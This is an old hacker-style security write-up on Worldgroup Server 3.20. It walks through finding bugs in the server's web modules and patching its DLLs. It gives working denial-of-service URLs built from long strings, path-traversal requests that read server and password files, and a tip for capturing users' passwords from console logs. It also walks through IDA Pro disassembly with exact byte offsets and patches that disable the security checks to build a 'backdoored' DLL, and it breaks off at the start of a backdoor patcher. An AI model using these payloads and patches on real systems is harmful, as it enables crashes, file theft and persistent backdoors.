[WORLDGROUP SERVER ver. 3.20 for WiN9x/ME/NT/2000 Security overview]
2001/03/01, 13:46:50 pm I has decided post it 2002/01/12 16:54:00 pm


May be know about worldgroup server software from Gallacticom company.
http://gcomm.com One of very popular working hosts on that software is 
jungle.net. WGserver support services: www, ftp, pop3, smtp, irc, telnet, 
rlogin, nntp, client/server, dialup server. It's installing on Windows 
9x/NT/ME/2000. On windows NT working like a service. The makers of that soft
use politic of close code and for making any addon or plugins need to have
specific libraries for VB/BC. For buying this libs need a lot of money...
Sooo, who's not know what is fucking wg now know it;)
This story is begun, after on #wghack channel, one of my friends time from time
ask me about bugs in the WG software, but my answer "YES!" not inspired him.
And all began again. And i begin analysis this big monster...
All bugs connected with configuration i decide to reject, becouse he's ask me
about vulnerabilities, which will be in any hosts on wgserver v3.20. 
Heh, a lot of *.dll, hmm... i will explore it's after terminal testing...
I run WG and telnet into the terminal, after it i begin testing every module
on known mistakes. All my actions were written in log file and audit file.
And decide to did real-time log file with own traffic in traffic.txt:)
How i did this!? It's easy! Run from START->RUN: regedit, then go to:
HKEY_LOCAL_MACHINE\SOFTWARE\Galacticomm\Worldgroup\3.00\Settings
and change UseConsoleWindow from 0 to 1. Then rerun WG, we seen old style
console with terminal emulation, open any user terminal emulation and push
CTRL+L, so we have full dump of user traffic:) Very nice if you evil admin
and wanna grab user internet passwords, usefull, if system use PPP mode for
dialup users.
Ok, i in the TOP MENU of system, first what i want to test it's command strings.
It's range from 256 to 512, it's depending on system configuration. Hmm, may
be i bad tester, but i can't find nothing intresting( i mean standart modules).
I know about some addons, what they crach after long or error string. For,
example i can sleep any user in terminal teleconferece, but it's not intresting.
Just a send a lot of garbage...
Then begin testing function of different modules. Not so intresting...
Just i can fake any email from terminal, just a use colors and ANSI graphics
with ANSI animation elements. Other trick in the Library module with ANSI
graphics too, again fake info. Library module understabd zips and after
uploading, lib module unzip file and unpack file_id.diz. This file long time
ago useing for archive description. First on playing with zip file with
zero information. Big file with binary zeros, 2 gigs, after compression file
was very small, but after unpacking.... :)) If you system with low memmory,
say bye-bye... Then, i playing with ANSI in file_id.diz, and user can seen 
very fun pictures and other messages about fucking world. Hmm, any body
can did file_id.diz with faked system variable!? I think what terminal
modules working not one year and all big misstakes already founded, i decide
try to find bugs in new modules for old services, like a WWW and other.
Heh, ok, lets go! SMTP/FTP/IRC have not critical bugs, like a SPAM support,
and i can kick any WG user from any IRC server, and mail faking with out
right reply adress. That bugs is nothing... just for gun users:)
FTP server is fun too, becouse some big files with national code page not
listed or hide. SMTP support 1 and 2 mode. Mode 1 is mailing with out
login, you can send email from any adress with any FROM fild. IRC client is
realy sucks, support command from module only and use IRC server messages for
user status. For example: if i sitting with my friend from wg irc client on
one IRC server with nickname error66 and do /msg Sexy Heya!, user Sexy will
kicked from IRC server by WG client. You can did it on channel for more 
effect:)
Then i look in to the my log files with my own actions and system answers.
Very often i seen messages about buffer over flow. Deam, it's very intresting
and i with more enthusiasm begin to test new modules for WEB interface.
Hmm, big work, and i test every module from one to one. I save pages and change
length of forms and filds, then i did POST to my poor WG server;)
Deam, guys from gcomm did, part ofcode in galacth.dll, cut all what will 
more them 256 symbols. Time to think head=)) I download from warez ftp IDA PRO.
Hm, system have more them 30 *.DLL and need to choice DLL with code with
security politics. Looking in to the logs. I seen many messages about errors
in WWW. I remember error messages and found their in: galwebd.dll and
galacth.dll. Galwebd.dll control for "..", example: 
http://www.cool.com/....../autoexec.bat.
Galacth.dll controling for many important static and dynamic variable.
You can to see it by F3 in FAR. Deam, soft will be strong, but after request
differents extenteds, i seen something intresting...
I begin testing modules from one to one: "a.a":
http://www.cool.com/a.a
http://www.cool.com/email/a.a
http://www.cool.com/polls/a.a
http://www.cool.com/account/a.a
http://www.cool.com/singup/a.a
etc...
Some modules give me in browser window, this:
Error priming map. See below. 
DynaFile C:\PROGRAM FILES\GALACTICOMM\WORLDGROUP SERVER\galacth\galuieah\a.a, 
3 steps
      1. TABLE BEGINS 6273-10195248(10188976) 1881-9b9130(9b78b0)
      2. COLUMN, ID#2: LISTITEM (0), LISTITEM (0)
      3. TABLE ENDS 92-6296(6205) 5c-1898(183d)
      4. END OF MAP: 10188976-20307839(10118864) 9b78b0-135df7f(9a66d0)
Can't open C:\PROGRAM FILES\GALACTICOMM\WORLDGROUP SERVER\galacth\galuieah\a.a
, in C:\PROGRAM FILES\GALACTICOMM\WORLDGROUP SERVER\galacth\galuieah\a.a, 
Default w/table
No, server not crashed, but already i can seen some usefull info. Path to
web server still will not intresting for me. Four thing was be important,
it's tested my requestions on bugs. And system support of dynamic files was
good for me. All funs and intresting was more then 256 symbols. I tryed to
crash server and i did it on windows 95/98/ME.
May be WG use functions of installed system, this is not best way...
Denial of Service:
http://www.cool.com/signup/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.A
After it, I has continued experiments with the access to files. But before it
loaded IDA Pro. I must to know all possibilities of this bug and what be writed
to if will be error. After some minutes i knew what some WWW modules of WG,
bad understand symbol of point:
http://127.0.0.1/signup/!.
Error priming map. See below. 
DynaFile C:\PROGRAM FILES\GALACTICOMM\WORLDGROUP SERVER\galacth\galsupah\!, 
3 steps
     1. TABLE BEGINS 1230259009-2527171203(1296912195) 49544341-96a19283(4d4
d4f43)
     2. COLUMN, ID#0: LISTITEM 1734109300-3704607956(1970498657) 675c6874-dccfd
4d4(75736c61), LISTITEM 1550344560-3251425240(1701080681) 5c686170-c1cccfd8(656
46e69)
      3. TABLE ENDS (0)
      4. END OF MAP: (0)
Can't open C:\PROGRAM FILES\GALACTICOMM\WORLDGROUP SERVER\galacth\galsupah\!
, in C:\PROGRAM FILES\GALACTICOMM\WORLDGROUP SERVER\galacth\galsupah\!, Sign-up
 form
http://127.0.0.1/signup/.!
Error priming map. See below. 
DynaFile C:\PROGRAM FILES\GALACTICOMM\WORLDGROUP SERVER\galacth\galsupah\.!,
 3 steps
      1. TABLE BEGINS 0-3(4) 0-3(4)
      2. COLUMN, ID#0: LISTITEM 1380998202-2476909448(1095911247) 52505c3a-
93a2a388(4152474f), LISTITEM 0-1548961099(1548961100) 0-5c53454b(5c53454c)
      3. TABLE ENDS 7733528-1402360172(1394626645) 760118-5396516c(53205055)
      4. END OF MAP: 29-7733476(7733448) 1d-7600e4(7600c8)
Can't open C:\PROGRAM FILES\GALACTICOMM\WORLDGROUP SERVER\galacth\galsupah\.!
, in C:\PROGRAM FILES\GALACTICOMM\WORLDGROUP SERVER\galacth\galsupah\.!, 
Sign-up form
I trying this string:
http://127.0.0.1/signup/.!/..../wow.html
Error priming map. See below. 
DynaFile C:\PROGRAM FILES\GALACTICOMM\WORLDGROUP SERVER\wow.html, 3 steps
      1. TABLE BEGINS 1230259009-2527171203(1296912195) 49544341-96a19283
(4d4d4f43)
      2. COLUMN, ID#0: LISTITEM 7105908-1977604564(1970498657) 6c6d74-75dfd9d4
(75736c61), LISTITEM 1550344560-3251425240(1701080681) 5c686170-c1cccfd8(65646e69)
      3. TABLE ENDS (0)
      4. END OF MAP: (0)
Can't open C:\PROGRAM FILES\GALACTICOMM\WORLDGROUP SERVER\wow.html
, in C:\PROGRAM FILES\GALACTICOMM\WORLDGROUP SERVER\wow.html, Sign-up form
Hmm, this more intresting=) So as this file not exist, i has decided
use other name of the exist file. For example, wgserver.exe:
http://127.0.0.1/signup/.!/..../wgserver.exe
Error priming map. See below. 
DynaFile C:\PROGRAM FILES\GALACTICOMM\WORLDGROUP SERVER\wgserver.exe, 3 steps
      1. TABLE BEGINS (0)
      2. COLUMN, ID#0: LISTITEM 153-4128920(4128768) 99-3f0098(3f0000), 
LISTITEM 0-91(92) 0-5b(5c)
      3. TABLE ENDS (0)
      4. END OF MAP: (0)
Symbol missing or out of order: LISTITEM
, in C:\PROGRAM FILES\GALACTICOMM\WORLDGROUP SERVER\wgserver.exe, Sign-up 
form
Heh, very nice. System is ready to return file to us, but can not to find it
in the variable list of this module:
Symbol missing or out of order: LISTITEM
A little below I tell as this occurs...
I test module to module and stoped on POLLS:
http://127.0.0.1/polls/index./..../galpmah.msg
This string return to me all text from galpmah.msg file.
We must be registered users or we can't join to the POLLS module.
Than more your own access level in the WG system, that more your LISTITEM.
I tried again and again and got own *.pwl files, but this way worked on
Windows 95/98/Millenium. Was Of Interest check this on Windows NT 4.0 + 
service pack 6.0(eng). This trick did not work on NT. And was strange what 
bug with point is worked, but I could not gain access to high directories
(access around of one bugged module). Server gave report that: not possible 
open required file. I am think that WGS uses several other *.exe and *.dll 
files on NT platform.Time to find anything more interesting. I has written 
small scanner, which generates requests for each module with different long. 
After scanning, i found this:
-----------------------------------------------------------------------------
Error priming map. See below. 
DynaFile c:\wgserv\<name of module>\<trick string>\<link to file>, 3 steps
      1. TABLE BEGINS 6273-10195248(10188976) 1881-9b9130(9b78b0)
      2. COLUMN, ID#2: LISTITEM (0), LISTITEM (0)
      3. TABLE ENDS 92-6296(6205) 5c-1898(183d)
      4. END OF MAP: 10188976-20307839(10118864) 9b78b0-135df7f(9a66d0)
Can't open c:\wgserv\<name of module>\<trick string>\<link to file>
, in c:\wgserv\<name of module>\<trick string>\<link to file>
-----------------------------------------------------------------------------
You can got Blue screen of Death, if your server have low hardware. You need
to send some requests with certain frequency and certain long of request.
For example:
http://Server/signup/AAAAAA from 230 to 512 AAAA.A or
http://Server/signup/AAAAAA from 230 to 512 AAAAA.A
To find point of death much easy, needed to add to each request "A", until 
server does not give this message:
-----------------------------------------------------------------------------
DynaFile c:\wgserv\<name of module>\<trick string>\<link to file>, XXX steps
      1. TABLE BEGINS 6273-10195248(10188976) 1881-9b9130(9b78b0)
      2. COLUMN, ID#2: LISTITEM (0), LISTITEM (0)
      3. TABLE ENDS 92-6296(6205) 5c-1898(183d)
      4. END OF MAP: 10188976-20307839(10118864) 9b78b0-135df7f(9a66d0)
Can't open , in 
-----------------------------------------------------------------------------
Will now deprive one "A" from our request and got point of Death.
DoS = http://server/bugged module/(AAAAA....AAA.A)-A
Easy way to do this is to make CGI scaner with big and different DoS strings.
To Start its and wait result, if server not dead, server is lucky:)
Often occurs hanging TCP/IP channels and server can't answer on new request,
and administrator must reset channels from console.
To Let's the analyse in functioning a handler url requests. Part of WEB
security there is in the galacth.dll, this library rejects all that on 
its opinion are not faithfull. This is seen on reporting, which inhere 
inside this library.

Loading galacth.dll in the IDA Pro and see interesting reporting:
a403Forbidden   db '403 Forbidden',0   
aGalacthSuspend db 'galacth/suspend.htm',0
a401Unauthorize db '401 Unauthorized',0
aWwwAuthenticat db 'WWW-Authenticate',0
aGalacthUnauth_ db 'galacth/unauth.htm',0
aGalacthLogin_h db 'galacth/login.htm',0
To Let's find a piece of the code for these lines. Push alt+t and enter
a403Forbidden and find:
CODE:004063FB   push    offset a403Forbidden
This preparation to conclusion of reporting, go in the most top of file
and are trying to find calling a offset 4063FB:
Below on the code of program we see calling our message.
;Dependencies of transition from the value in eax.
CODE:004063C1  add     eax, 4          ; switch 6 cases
CODE:004063C4  cmp     eax, 5
CODE:004063C7  ja      loc_0_4065CD    ; default
CODE:004063CD  jmp     ds:off_0_4063D4[eax*4] ; switch jump
Address of transition:
Our -> CODE:004063D4   dd offset loc_0_4063FB  ; jump table for switch
CODE:004063D4      dd offset loc_0_4065CD
CODE:004063D4      dd offset loc_0_406435
CODE:004063D4      dd offset loc_0_4065CD
CODE:004063D4      dd offset loc_0_4065CD
We have come across to the transitions system, if on some reasons our 
request did not pass. Piece of this subroutine has an offset 4063AA.
Move on code of program upwards and and will see how check occurs.
CODE:004063AA loc_0_4063AA:           ; CODE XREF: acthSession
CODE:004063AA    mov     edx, [ebx+10h]
CODE:004063AD    push    edx
CODE:004063AE    mov     ecx, [edx]
CODE:004063B0    call    dword ptr [ecx+4]
CODE:004063B3    pop     ecx
CODE:004063B4    mov     esi, eax
CODE:004063B6    push    dword ptr [ebx+10h]
CODE:004063B9    call    @acthSynthesis@postproceed$qv ; acthSynt
CODE:004063BE    pop     ecx
CODE:004063BF    mov     eax, esi
CODE:004063C1    add     eax, 4          ; switch 6 cases
CODE:004063C4    cmp     eax, 5
CODE:004063C7    ja      loc_0_4065CD    ; default
Still difficult to say, how checking occurs, but we already know what 
registers will be used. Move on code of program upwards, need
to find this subroutine calling, this is 4063AA offset:
CODE:00406394 loc_0_406394:                       ; CODE XREF: acthSession
CODE:00406394      cmp     dword ptr [ebx+10h], 0
---->CODE:00406398    jnz     short loc_0_4063AA
CODE:0040639A      push    ebx
CODE:0040639B      mov     ecx, [ebx+0Ch]
CODE:0040639E      push    ecx
CODE:0040639F      mov     eax, [ecx]
CODE:004063A1      call    dword ptr [eax+1Ch]
CODE:004063A4      add     esp, 8
CODE:004063A7      mov     [ebx+10h], eax
See conditional transition on our offset(jnz short loc_0_4063AA), 
but comparison(cmp dword ptr [ebx+10h], 0) is too strange, and i think
need move on code of program upwards and to find calling this piece of code,
it's (offset) CODE:00406394.
To Move thereby, we will get to top of cascade of this checks, this code:
(In the future will be seen, that I goes on wrong way... )
(You will seen it too. Way of mistakes - way of education;> )
CODE:00406352  cmp     word ptr [ebx+34h], 0
-->CODE:00406357  jz      loc_0_4065EE
CODE:0040635D  push    dword ptr [ebx+30h]
CODE:00406360  call    sub_0_41416C
CODE:00406365  pop     ecx
CODE:00406366  test    al, al
---->CODE:00406368  jnz     short loc_0_406380
CODE:0040636A  mov     ax, 1
CODE:0040636E  mov     edx, [ebp+var_14C]
CODE:00406374  mov     large fs:0, edx
CODE:0040637B  jmp     loc_0_406622
Transition much like like truth, but after changes server gave me Forbidden,
after request http://server/..../boot.ini. To Let's look our logs...
In the log files seen, what server got alert on "..". Remember old DOS!?
cd .. or cd ../../dos6.22  It's it! This check there is in galwebd.dll ;)
Heh, loading galwebd.dll in he IDA Pro and trying to find string "..":
DATA:004054E6 a__             db '..',0
In segment given mortgaged constant '..' with 4054E6 offset. We again moving
upward(searching upward or backward):
CODE:00402FC5     push    ebp
CODE:00402FC6     mov     ebp, esp
CODE:00402FC8     push    ebx
CODE:00402FC9     mov     ebx, [ebp+arg_0]
Yeah, his is our offset!
--> CODE:00402FCC push    offset a__
Value a__ pushing in stack, to extract in the future its from stack and
to realize a checking of request for "..", example http://SERVER/..../boot.ini
Moving (downward or forward) and look that goes after push offset a__:
CODE:00402FD1     push    ebx
Program again something saves in the stack. Look else below...:)
Calling a first subroutine for checking for the prohibited way to the file.
This is because url must not leave for range, definied in memories.
Example, our server inheres to c:\wgserv\webpages\index.html
and it is available to http://server/index.html. 
So directory c:\wgserv\webpages must be a root a directory for WEB server.
Our calling:
-->CODE:00402FD2     call    j__strstr
This on us not interesting...
CODE:00402FD7     add     esp, 8
Aha, here is something interesting:
After return subroutine j__strstr, occurs checking the results after 
processing our request, which we will send to the server.
CODE:00402FDA     test    eax, eax
Command test returns value 0 or 1 in flag ZF, dependencies from results check.
Transition for JNZ is realized, if flag ZF is 1.
I can not see what flags will be installed under one or another URL.
But possible look that is roofed for offset short loc_0_402FF9.
CODE:00402FDC     jnz     short loc_0_402FF9
Here is that beside us on this offset finds IdaPro:
CODE:00402FF9 loc_0_402FF9:                       ; CODE XREF: _badfspec+1
CODE:00402FF9                                         ; _badfspec+26j
CODE:00402FF9     push    ds:dword_0_405D70
CODE:00402FFF     call    j__setmbk
CODE:00403004     pop     ecx
CODE:00403005     push    ebx
CODE:00403006     push    22h
Output reporting on the error in browser.
->CODE:00403008     call    _byeweb
CODE:0040300D     add     esp, 8
Close-down with WEB interface.
->CODE:00403010     call    j__rstmbk
CODE:00403015     mov     ax, 1
CODE:00403019     pop     ebx
CODE:0040301A     pop     ebp
Output from subroutine:
->CODE:0040301B     retn
jnz short loc_0_402FF9, goes on offse loc_0_402FF9, if our URL sent server is 
forbidden or unfaithful. We know that here goes a check '..', this transition 
needed to change. And our request http://server/..../boot.ini, will be work.
Loading galwebd.dll in hiew.exe and go to 000025DC offset, changing 751B to 
9090 and our backdoor is ready. 
						backdoor.asm

==============================Understanding=================================
Time to return to galacth.dll for full understanding inside code.
This DLL must answer on our questions about send or not send requested
file (by http). For example, i have directory of web server (c:\wgserv) 
with file test.htm and i wanna to get it. For testing, i choice accoun module
from WEB interface. http://127.0.0.1/account/index.\....\test.htm
I'm try to get file  from founded of me bug with point (server/.\file),
and got answer:
-----------------------------------------------------------------------------
Error priming map. See below. 
DynaFile C:\wgserv\test.htm, 3 steps
      1. TABLE BEGINS 65-7733584(7733520) 41-760150(7768768)
      2. COLUMN, ID#2: LISTITEM 1095911247-2325243803(1229332557) 
4152474f-8a98679b(4946204d), LISTITEM 1548961100-2644477586(1095516487) 
5c53454c-9d9f8692(414c4147)
      3. TABLE ENDS 92-113(22) 5c-71(16)
      4. END OF MAP: 7733520-15467039(7733520) 760110-ec021f(760110)
Symbol missing or out of order: LISTITEM
, in C:\wgserv\test.htm, Default w/table
-----------------------------------------------------------------------------
May be try to find call of function "Error priming map. See below." and
to look internal code. In the file galatch.dll, we find adress of this
message. //p.s. Again IDA Pro//
It's it:
DATA:0041C4BB aErrorPrimingMa db 'Error priming map.  See below.',0
Need to find call on this code. It's it:
CODE:004024BC                 push    offset aErrorPrimingMa
This is full piece of subroutine with pushing in stack message (push offset 
aErrorPrimingMa):
CODE:0040249A loc_0_40249A:                        ; CODE XREF: dnfHandler:
CODE:0040249A                                      ; DATA XREF: dnfHandler:

Some value is pushed in stack. It's name of requested file?:)
CODE:0040249A   push    dword ptr [ebx+4] ; case 0x2

Call of subrouttine, which determined, can file be sent to user or no.
CODE:0040249D   call    @dnfMap@primeDo$qv ; dnfMap::primeDo(voi
CODE:004024A2   pop     ecx
Testing results of subroutine, results will be ZF flag.
CODE:004024A3   test    ax, ax
I don't know on all 100% what flag will be in ZF, this depends on filename.
But i can say, what, if i request prohibited file, transition not will.
I know it, becouse i already seen all future calls, just a garbage for your 
head, not more... So, if we did request on file and this file not be in
the memorry map (Error priming map) of normal files for download and 
transition to offset 4026D6 not will be. May be, be more intresting this:
CODE:004024A6   jnz     loc_0_4026D6    ; default
OK, let's down by progr. code and may we find something intresting:)
Sending in register EDX values keeping in [ebx+4], it's again part of our
URL string.
CODE:004024AC   mov     edx, [ebx+4]
Testing values.
CODE:004024AF   cmp     dword ptr [edx+28h], 3
Aha, look on the code below.....
This is needed transition.
If transition will not be realized, we will see message "Error priming map. 
See below.", if yes, that will see something other. =)
--->CODE:004024B3   jnz     short loc_0_4024E6
To check our theory, will correct piece of code in galacth.dll,
and possible we not will see anymore like a "NO ACCESS" =))
I help and say to you real offset 00001AB3 for hiew.exe.
Ok, now change jnz to jump from 7531 to EB31.
This part of code shows that it does not matter, if transition will not be 
realized.
CODE:004024B5   push    dword ptr [ebx+4]
CODE:004024B8   mov     edi, [ebx]
CODE:004024BA   push    0
CODE:004024BC   push    offset aErrorPrimingMa
CODE:004024C1   push    edi
CODE:004024C2   call    j_@ostream@outstr$qpxct1 ; ostream::outs
CODE:004024C7   add     esp, 0Ch
CODE:004024CA   push    edi
CODE:004024CB   call    j_@endl$qr7ostream ; endl(ostream &)
CODE:004024D0   pop     ecx
CODE:004024D1   push    eax
CODE:004024D2   call    @$blsh$qr7ostreamr6dnfMap ; operator<<(o
CODE:004024D7   add     esp, 8
CODE:004024DA   mov     dword ptr [ebx+0Ch], 5
CODE:004024E1   jmp     loc_0_4026D6    ; default

OK, running server and look, that it writes us interesting.
Check bug i decide in modules, which before this did not give me files,
but returned this message:
----------------------------------------------------------------------------
Error priming map. See below. 
DynaFile c:\wgserv\zip2exe.exe, 3 steps
      1. TABLE BEGINS 65-7733584(7733520) 41-760150(760110)
      2. COLUMN, ID#2: LISTITEM 1095911247-2325243803(1229332557) 
4152474f-8a98679b(4946204d), LISTITEM 1548961100-2644477586(1095516487)
 5c53454c-9d9f8692(414c4147)
      3. TABLE ENDS 92-113(22) 5c-71(16)
      4. END OF MAP: 7733520-15467039(7733520) 760110-ec021f(760110)
Symbol missing or out of order: LISTITEM
----------------------------------------------------------------------------
At now, on request http://server/signup/./.../zip2exe.exe, server return:
-----------------------------------------------------------------------------
Symbol missing or out of order: LISTITEM , in c:\wgserv\zip2exe.exe, 
Sign-up form
------------------------------------------------------------------------------
Ok, at now me know, what checking of request consists of several parts, 
that we and expected at the beginning initially. Heh, very intresting to find
one more part of check. Again loading galacth.dll in the IDA Pro and
try to find string "Symbol missing or out of order:" by adress 41C56D:
DATA:0041C56D aSymbolMissingO db 'Symbol missing or out of order: ',0
Now find calling "aSymbolMissingO" by adress 402DAE:
CODE:00402DAC loc_0_402DAC:
CODE:00402DAC    push    0
--->CODE:00402DAE   push    offset aSymbolMissingO
CODE:00402DB3    push    esi
CODE:00402DB4    call    j_@ostream@outstr$qpxct1
CODE:00402DB9    add     esp, 0Ch
CODE:00402DBC    push    0
CODE:00402DBE    push    edi
CODE:00402DBF    push    esi
CODE:00402DC0    call    j_@ostream@outstr$qpxct1
CODE:00402DC5    add     esp, 0Ch
CODE:00402DC8    push    esi
CODE:00402DC9    call    j_@endl$qr7ostream
CODE:00402DCE    pop     ecx
CODE:00402DCF    push    ebx
CODE:00402DD0    call    @dnfMap@closein$qv
CODE:00402DD5    pop     ecx
CODE:00402DD6    xor     eax, eax
CODE:00402DD8    jmp     loc_0_402EEC
This full piece of the subroutine code.
Seen that here is no transition, only calling, which us do not interest.
We it is necessary to find this subroutine calling, for this need to find 
a calling offset loc_0_402DAC.
And certainly, we its find, here is piece of this code:
CODE:00402D9F    jz      short loc_0_402DA9
CODE:00402DA1    mov     esi, [ebx+24h]
CODE:00402DA4    add     esi, 3Eh
CODE:00402DA7    jmp     short loc_0_402DAC
CODE:00402DA9    mov     esi, [ebx+24h]
Seen that this fragment still answers for output of message only, need to
moveup by code of progr. But, since this code is part of big subroutines,
that us needed to find subroutine beginning, then already search its 
calling on its offset. Here is higher part of subroutines:
CODE:00402D50 loc_0_402D50:                           ; CODE
CODE:00402D50   mov     edx, [ebx+8]
CODE:00402D53   add     edx, 44h
CODE:00402D56   push    edx
CODE:00402D57   call    j_@istream@tellg$qv 
CODE:00402D5C   pop     ecx
CODE:00402D5D   mov     [ebp+var_4], eax
CODE:00402D60   push    100h
CODE:00402D65   lea     ecx, [ebp+var_104]
CODE:00402D6B   push    ecx
CODE:00402D6C   mov     eax, [ebx+8]
CODE:00402D6F   add     eax, 44h
CODE:00402D72   push    eax
CODE:00402D73   call    j_@istream@read$qpci 
CODE:00402D78   add     esp, 0Ch
CODE:00402D7B   mov     edi, eax
CODE:00402D7D   mov     edx, [edi+8]
CODE:00402D80   mov     edi, edx
CODE:00402D82   cmp     esi, edi
CODE:00402D84   jle     short loc_0_402DDD
CODE:00402D86   movsx   ecx, word ptr [ebx+12h]
CODE:00402D8A   shl     ecx, 5
CODE:00402D8D   mov     eax, [ebx+0Ch]
CODE:00402D90   lea     edx, [eax+ecx]
CODE:00402D93   movsx   ecx, word ptr [ebx+14h]
CODE:00402D97   mov     edi, [edx+ecx*4+8]
CODE:00402D9B   cmp     dword ptr [ebx+24h], 0
Before that how to search this subroutine calling, but conditional transition
jle  short loc_0_402DDD is not that, that us needed, may be we find jne 
transition, and if  go to offset 402DDD which may be contain jle transition,
we will see one more check which not intresting us at now.
At now we must to find string which causes our subroutine(402D50). 
Here is other subroutine, which calling our subroutine:
CODE:00402C95 loc_0_402C95:                           ; CODE
CODE:00402C95   cmp     word ptr [ebx+2Ch], 0
CODE:00402C9A   jz      loc_0_402E88
CODE:00402CA0   movsx   edx, word ptr [ebx+12h]
CODE:00402CA4   shl     edx, 5
CODE:00402CA7   mov     ecx, [ebx+0Ch]
CODE:00402CAA   lea     eax, [ecx+edx]
CODE:00402CAD   movsx   edx, word ptr [ebx+14h]
CODE:00402CB1   push    dword ptr [eax+edx*4+8]
CODE:00402CB5   call    j__strlen
CODE:00402CBA   pop     ecx
CODE:00402CBB   mov     esi, eax
CODE:00402CBD   cmp     esi, 100h
Here goes our subroutine calling after checking a long request of file.
100h is 256 in decimal system. If change this transition, server will give 
report on restriction in 256 symbols. So correct this transition we not will,
and will see some upward by code, so as downward us do not interest.
-->CODE:00402CC3   jl      loc_0_402D50
This par of code do not interest us, but brought it for more full beliefs 
about work given subroutines.
CODE:00402CC9   movsx   eax, word ptr [ebx+12h]
CODE:00402CCD   shl     eax, 5                     
CODE:00402CD0   mov     edx, [ebx+0Ch]
CODE:00402CD3   lea     ecx, [edx+eax]
CODE:00402CD6   movsx   eax, word ptr [ebx+14h]
CODE:00402CDA   mov     edi, [ecx+eax*4+8]
CODE:00402CDE   cmp     dword ptr [ebx+24h], 0
CODE:00402CE2   jz      short loc_0_402CEC
CODE:00402CE4   mov     esi, [ebx+24h]
CODE:00402CE7   add     esi, 3Eh
CODE:00402CEA   jmp     short loc_0_402CEF
This is intresting upward of subroutine:
CODE:00402C95 loc_0_402C95:                           ; CODE
CODE:00402C95   cmp     word ptr [ebx+2Ch], 0
CODE:00402C9A   jz      loc_0_402E88
CODE:00402CA0   movsx   edx, word ptr [ebx+12h]
CODE:00402CA4   shl     edx, 5
CODE:00402CA7   mov     ecx, [ebx+0Ch]
CODE:00402CAA   lea     eax, [ecx+edx]
CODE:00402CAD   movsx   edx, word ptr [ebx+14h]
CODE:00402CB1   push    dword ptr [eax+edx*4+8]
CODE:00402CB5   call    j__strlen
CODE:00402CBA   pop     ecx
CODE:00402CBB   mov     esi, eax
CODE:00402CBD   cmp     esi, 100h
Hmm, may be this conditional transition jz loc_0_402E88 is that we searched, 
but while we can not this exactly say.
To Let's look into the calling by her subroutine by adress 402E88:
CODE:00402E88 loc_0_402E88:                           ; CODE
CODE:00402E88                 push    ebx
CODE:00402E89                 call    @dnfMap@symDo$qv
CODE:00402E8E                 pop     ecx
CODE:00402E8F                 test    ax, ax
CODE:00402E92                 jz      short loc_0_402E9C
CODE:00402E94                 mov     word ptr [ebx+2Ch], 1
CODE:00402E9A                 jmp     short loc_0_402EE8
All much like like truth, we exactly know, that transition on this piece of 
code is not realized under forbidden by URL and
as a result is output message "Symbol missing or out of order: ". 
And in this piece of the code of no calling other subroutines forbiding 
connection with the server. Has Sense contribute changes to galacth.dll, that 
transition on this piece of the code was realized in any way. This part code
may be finded by offse 229A and look here is so:
0000229A: 0F84E8010000    je     000002488
And change it to:
0000229A: E9E9010000                   jmp    000002488
0000229F: 90                           nop
000022A0: 90                           nop
After changes, on request SERVER/signup/.!/..../wgserver.exe, server has shown 
message:
------------------------------------------------------------------------------
"Two sample rows of table are not identical (map steps 1-3): 
0 + 0 != 840972841 , 
in C:\PROGRAM FILES\GALACTICOMM\WORLDGROUP SERVER\galuieah.msg, 
Sign-up form"
------------------------------------------------------------------------------
I can't to get any file, but i can get other files like a wgsmajor.msg or 
zip2exe.exe. Intresting... that if search this piece of code, this message
have adress:
DATA:0041C627 aTwoSampleRowsO db 'Two sample rows of table are not identical ',0
As always find calling a message, it's by adress:
CODE:00403330 loc_0_403330:                           ; CODE
CODE:00403330   mov     [ebp+var_38], ecx
CODE:00403333   push    0
It's it:
-->CODE:00403335   push    offset aTwoSampleRows
Below goes complacent long piece of code, its I not become here describe,
so as nothing essential for our problem it does not be kept.
To Let's find call of subroutine outpuing such bad messages(loc_0_403330). 
Find call of offset(403330) by adress(4032F7):
Completely piece of the code.
CODE:004032F7 loc_0_4032F7:                           ; CODE
CODE:004032F7   lea     edx, [ebx+edi]
CODE:004032FA   cmp     edx, [ebp+var_18]
CODE:004032FD   jge     loc_0_4033F8
CODE:00403303   mov     ecx, [ebp+var_18]
CODE:00403306   mov     [ebp+var_24], ecx
CODE:00403309   mov     [ebp+var_28], ebx
CODE:0040330C   mov     [ebp+var_2C], edi
CODE:0040330F   movsx   eax, [ebp+var_20]    
CODE:00403313   inc     eax
CODE:00403314   mov     [ebp+var_30], eax
CODE:00403317   movsx   edx, [ebp+var_1E]
CODE:0040331B   inc     edx
CODE:0040331C   mov     [ebp+var_34], edx
CODE:0040331F   cmp     dword ptr [esi+24h], 0
CODE:00403323   jz      short loc_0_40332D
CODE:00403325   mov     ecx, [esi+24h]
CODE:00403328   add     ecx, 3Eh
Transition in our ugliness(loc_0_403330).
->CODE:0040332B   jmp     short loc_0_403330
CODE:0040332D   mov     ecx, [esi+24h]
So as we deal with subtraction and adding, logistical search conditional 
transition, which is usually used. 
Insofar I remember it, it's:
JGE - jump if sign      comparison negative
JA - jump if not sign  comparison positively
We as once have such conditional transition at the beginning of initially 
this subroutine code. This is:
CODE:004032FA   cmp     edx, [ebp+var_18]
->CODE:004032FD   jge     loc_0_4033F8
If our request fails condition (0-0)!=some_variable(our request), transition 
will not be realized. We is necessary change conditional transition
jge loc_0_4033F8 on unconditional jmp loc_0_4033F8.
To teach server new arithmetic (0+-0)=[ANY_NUMBER]. 
Do necessary changes to galacth.dll file: 
Goto offset 28FD, it's looks like a:
000028FD: 0F8DF5000000    jge    0000029F8
Bytes change For making an unconditional transition on:
000028FD: E9F6000000      jmp    0000029F8
00002902: 90              nop
Now save change and will try to get some file, for example:
http://127.0.0.1/signup/....../boot.ini
BOOM!, we did it! 
-B- O- N- U- S-#1
Ok, time to creat a little program, this program will to patch the galacth.dll,
and we will have backdoored galacth.dll. With backdoored galacth.dll we can
get any readable file of WGS or OS.
Backdoor.asm
;################################################################
;############ Backdoor for WorldGroup Server v3.20 ##############
;############ This file patch for galwebd.dll      ##############
;############ After (dll) correction, try urls:    ##############
;############ For C:\WGSERV                        ##############
